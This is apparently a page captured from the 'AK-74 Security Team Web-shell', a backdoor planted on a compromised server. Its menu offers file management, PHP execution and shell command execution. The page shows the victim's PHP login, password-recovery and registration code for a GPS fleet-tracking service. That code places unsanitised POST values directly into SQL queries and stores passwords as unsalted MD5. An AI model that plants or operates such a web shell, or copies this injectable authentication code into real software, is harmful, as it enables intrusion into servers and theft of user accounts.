.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<? session_start(); include ('../init.php'); include ('fn_common.php'); if (version_compare(PHP_VERSION, '5.5.0', '>=')) { include ('../tools/email.php'); } else { include ('../tools/email52.php'); } loadLanguage($gsValues['LANGUAGE']); if (@$_POST['cmd'] == 'session_check') { checkUserSession(); if (checkUserSession2() == true) { echo 'true'; } else { echo 'false'; } die; } if (@$_POST['cmd'] == 'login') { $username = strtolower($_POST["username"]); $username = substr($username, 0, 50); $username = str_replace("\\", "", $username); $username = str_replace("/", "", $username); $username = str_replace("|", "", $username); $username = str_replace("(", "", $username); $username = str_replace(")", "", $username); $username = str_replace("'", "", $username); $username = str_replace('"', "", $username); $username = str_replace('`', "", $username); $password = $_POST["password"]; $remember_me = $_POST["remember_me"]; $mobile = $_POST["mobile"]; // check failed logins limit $q = "SELECT * FROM `gs_user_failed_logins` WHERE `ip`='" . $_SERVER['REMOTE_ADDR'] . "' AND dt_login > DATE_SUB(UTC_TIMESTAMP(), INTERVAL 30 MINUTE)"; $r = mysqli_query($ms, $q); $count = mysqli_num_rows($r); if ($count >= 500) { echo 'ERROR_MANY_FAILED_LOGIN_ATTEMPTS'; //write log writeLog('user_access', 'User login: too many failed login attempts. Username: "' . $username . '"'); } else { $q = "SELECT * FROM `gs_users` WHERE `username`='" . $username . "' AND `password`='" . md5($password) . "' LIMIT 1"; $r = mysqli_query($ms, $q); if ($row = mysqli_fetch_array($r)) { //by ahmed el gohary $billing_data = date("z", strtotime($row['bill_date'])); $current_data = date("z", strtotime(date("Y-m-d"))); $billing_year = date('Y', strtotime($row['bill_date'])); $current_year = date("Y", strtotime(date("Y-m-d"))); $diffrence = $billing_year - $current_year; $parts = explode('-', $row['bill_date']); if ($parts[0] == 0000) { $diffrence = 1; } //end by ahmed el gohary if ($row['active'] == 'true' && $diffrence >= 0) { if ($remember_me == 'true') { setUserSessionHash($row['id']); } // reset session array $_SESSION = array(); setUserSession($row['id']); setUserSessionSettings($row['id']); setUserSessionCPanel($row['id']); if (($gsValues['PAGE_AFTER_LOGIN'] == 'cpanel') && ($_SESSION["cpanel_privileges"] != false)) { //echo 'LOGIN_CPANEL'; $result['msg'] = 'LOGIN_CPANEL'; print_r(json_encode($result)); } if (isset($billing_data) && $diffrence == 0) { $tdate = $billing_data - $current_data; $result['residual'] = $tdate; //echo $tdate; if ($tdate >= -7 && $tdate < 0) { $result['tolorance'] = $tdate; $_SESSION['tolorance'] = $tdate; $result['msg'] = 'LOGIN_TRACKING'; print_r(json_encode($result)); } if ($tdate >= 0 && $tdate <= 5) { $result['residual'] = $tdate; $_SESSION['residual'] = $tdate; $result['msg'] = 'LOGIN_TRACKING'; print_r(json_encode($result)); } if ($tdate > 5) { $_SESSION['tolorance'] = $tdate; $result['msg'] = 'LOGIN_TRACKING'; print_r(json_encode($result)); } if ($tdate < -7) { $result['residual'] = $tdate; $result['msg'] = 'ERROR_ACCOUNT_LOCKED'; print_r(json_encode($result)); //write log writeLog('user_access', 'User login: account locked. Username: "' . $username . '"'); } } else { $result['msg'] = 'LOGIN_TRACKING'; print_r(json_encode($result)); } //write log writeLog('user_access', 'User login: successful'); //update user usage updateUserUsage($row['id'], 1, false, false, false, false); } else { //echo 'ERROR_ACCOUNT_LOCKED'; $result['msg'] = 'ERROR_ACCOUNT_LOCKED'; print_r(json_encode($result)); //write log writeLog('user_access', 'User login: account locked. Username: "' . $username . '"'); } } else { // insert failed login $q = "INSERT INTO `gs_user_failed_logins` (`ip`, `dt_login`) VALUES ('" . $_SERVER['REMOTE_ADDR'] . "','" . gmdate("Y-m-d H:i:s") . "')"; $r = mysqli_query($ms, $q); //echo 'ERROR_USERNAME_PASSWORD_INCORRECT'; $result['msg'] = 'ERROR_USERNAME_PASSWORD_INCORRECT'; print_r(json_encode($result)); //write log writeLog('user_access', 'User login: unsuccessful. Username: ' . $username); } } die; } if (@$_POST['cmd'] == 'logout') { //write log writeLog('user_access', 'User logout'); if (isset($_SESSION["user_id"])) { deleteUserSessionHash($_SESSION["user_id"]); } session_unset(); session_destroy(); echo $gsValues['URL_LOGIN']; die; } if (@$_POST['cmd'] == 'logoutmobile') { //write log writeLog('user_access', 'User logout'); $username=$_SESSION["username"]; if (isset($_SESSION["user_id"])) { deleteUserSessionHash($_SESSION["user_id"]); } session_unset(); session_destroy(); echo $gsValues['URL_LOGIN'].'/mobile/?goodbye='.$username; die; } if (@$_POST['cmd'] == 'recover_url') { $email = $_POST['email']; $token = $_POST['token']; if ($email != "") { if ($token == $_SESSION["token"]) { $email = strtolower($email); $q = "SELECT * FROM `gs_user_account_recover` WHERE `email`='" . $email . "' AND dt_recover > DATE_SUB(UTC_TIMESTAMP(), INTERVAL 5 MINUTE)"; $r = mysqli_query($ms, $q); $count = mysqli_num_rows($r); if ($count > 0) { echo 'ERROR_MANY_LOGIN_RECOVERY_ATTEMPTS'; } else { $q = "SELECT * FROM `gs_users` WHERE `email`='" . $email . "' LIMIT 1"; $r = mysqli_query($ms, $q); $num = mysqli_num_rows($r); if ($num > 0) { $row = mysqli_fetch_array($r); $token = genAccountRecoverToken($email); $url_recover = $gsValues['URL_ROOT'] . '/index.php?cmd=recover&token=' . $token; $template = getDefaultTemplate('account_recover_url', $gsValues['LANGUAGE']); $subject = $template['subject']; $message = $template['message']; $subject = str_replace("%SERVER_NAME%", $gsValues['NAME'], $subject); $subject = str_replace("%URL_RECOVER%", $url_recover, $subject); $message = str_replace("%SERVER_NAME%", $gsValues['NAME'], $message); $message = str_replace("%URL_RECOVER%", $url_recover, $message); if (sendEmail($email, $subject, $message)) { // inset token $q = "INSERT INTO `gs_user_account_recover` (`token`, `email`, `dt_recover`) VALUES ('" . $token . "','" . $email . "','" . gmdate("Y-m-d H:i:s") . "')"; $r = mysqli_query($ms, $q); echo 'OK'; //write log writeLog('user_access', 'User recover: URL sent. E-mail: ' . $email); } else { echo 'ERROR_NOT_SENT'; } } else { echo 'ERROR_EMAIL_NOT_FOUND'; //write log writeLog('user_access', 'User recover: no such e-mail. E-mail: ' . $email); } } } } die; } if (@$_POST['cmd'] == 'recover') { $token = $_POST['token']; $q = "SELECT * FROM `gs_user_account_recover` WHERE `token`='" . $token . "' LIMIT 1"; $r = mysqli_query($ms, $q); $num = mysqli_num_rows($r); if ($num > 0) { $row = mysqli_fetch_array($r); $email = $row['email']; $q = "SELECT * FROM `gs_users` WHERE `email`='" . $email . "' LIMIT 1"; $r = mysqli_query($ms, $q); $num = mysqli_num_rows($r); if ($num > 0) { $row = mysqli_fetch_array($r); $new_password = genAccountPassword(); $template = getDefaultTemplate('account_recover', $gsValues['LANGUAGE']); $subject = $template['subject']; $message = $template['message']; $subject = str_replace("%SERVER_NAME%", $gsValues['NAME'], $subject); $subject = str_replace("%URL_LOGIN%", $gsValues['URL_LOGIN'], $subject); $subject = str_replace("%EMAIL%", $email, $subject); $subject = str_replace("%USERNAME%", $row['username'], $subject); $subject = str_replace("%PASSWORD%", $new_password, $subject); $message = str_replace("%SERVER_NAME%", $gsValues['NAME'], $message); $message = str_replace("%URL_LOGIN%", $gsValues['URL_LOGIN'], $message); $message = str_replace("%EMAIL%", $email, $message); $message = str_replace("%USERNAME%", $row['username'], $message); $message = str_replace("%PASSWORD%", $new_password, $message); if (sendEmail($email, $subject, $message)) { $q = "UPDATE gs_users SET password='" . md5($new_password) . "' WHERE email='" . $email . "'"; $r = mysqli_query($ms, $q); $q = "DELETE FROM `gs_user_account_recover` WHERE `token`='" . $token . "'"; $r = mysqli_query($ms, $q); echo 'OK'; //write log writeLog('user_access', 'User recover: successful. E-mail: ' . $email); } else { echo 'ERROR_NOT_SENT'; } } else { echo 'ERROR_EMAIL_NOT_FOUND'; //write log writeLog('user_access', 'User recover: no such e-mail. E-mail: ' . $email); } } else { echo 'ERROR_RECOVER_EXPIRED'; } die; } if ((@$_POST['cmd'] == 'register') && ($gsValues['ALLOW_REGISTRATION'] == "true")) { $email = $_POST['email']; $token = $_POST['token']; if ($email != '') { if ($token == @$_SESSION["token"]) { $account_expire = $gsValues['ACCOUNT_EXPIRE']; $account_expire_dt = ''; if ($account_expire == 'true') { $account_expire_dt = gmdate("Y-m-d", strtotime(gmdate("Y-m-d") . ' + ' . $gsValues['ACCOUNT_EXPIRE_PERIOD'] . ' days')); } $privileges = array(); $privileges['type'] = 'user'; $privileges['map_osm'] = stringToBool($gsValues['USER_MAP_OSM']); $privileges['map_bing'] = stringToBool($gsValues['USER_MAP_BING']); $privileges['map_google'] = stringToBool($gsValues['USER_MAP_GOOGLE']); $privileges['map_google_street_view'] = stringToBool($gsValues['USER_MAP_GOOGLE_STREET_VIEW']); $privileges['map_google_traffic'] = stringToBool($gsValues['USER_MAP_GOOGLE_TRAFFIC']); $privileges['map_mapbox'] = stringToBool($gsValues['USER_MAP_MAPBOX']); $privileges['map_arcgis'] = stringToBool($gsValues['USER_MAP_ARCGIS']); $privileges['map_yandex'] = stringToBool($gsValues['USER_MAP_YANDEX']); $privileges['kml'] = stringToBool($gsValues['KML']); $privileges['dashboard'] = stringToBool($gsValues['DASHBOARD']); $privileges['history'] = stringToBool($gsValues['HISTORY']); $privileges['reports'] = stringToBool($gsValues['REPORTS']); $privileges['tachograph'] = stringToBool($gsValues['TACHOGRAPH']); $privileges['tasks'] = stringToBool($gsValues['TASKS']); $privileges['rilogbook'] = stringToBool($gsValues['RILOGBOOK']); $privileges['dtc'] = stringToBool($gsValues['DTC']); $privileges['maintenance'] = stringToBool($gsValues['MAINTENANCE']); $privileges['expenses'] = stringToBool($gsValues['EXPENSES']); $privileges['object_control'] = stringToBool($gsValues['OBJECT_CONTROL']); $privileges['image_gallery'] = stringToBool($gsValues['IMAGE_GALLERY']); $privileges['chat'] = stringToBool($gsValues['CHAT']); $privileges['subaccounts'] = stringToBool($gsValues['SUBACCOUNTS']); $privileges = json_encode($privileges); $result = addUser('true', 'true', $account_expire, $account_expire_dt, $privileges, '', $email, $email, '', $gsValues['OBJ_ADD'], $gsValues['OBJ_LIMIT'], $gsValues['OBJ_LIMIT_NUM'], $gsValues['OBJ_DAYS'], $gsValues['OBJ_DAYS_NUM'], $gsValues['OBJ_EDIT'], $gsValues['OBJ_DELETE'], $gsValues['OBJ_HISTORY_CLEAR']); echo $result; } } die; } ?>
Rename:
-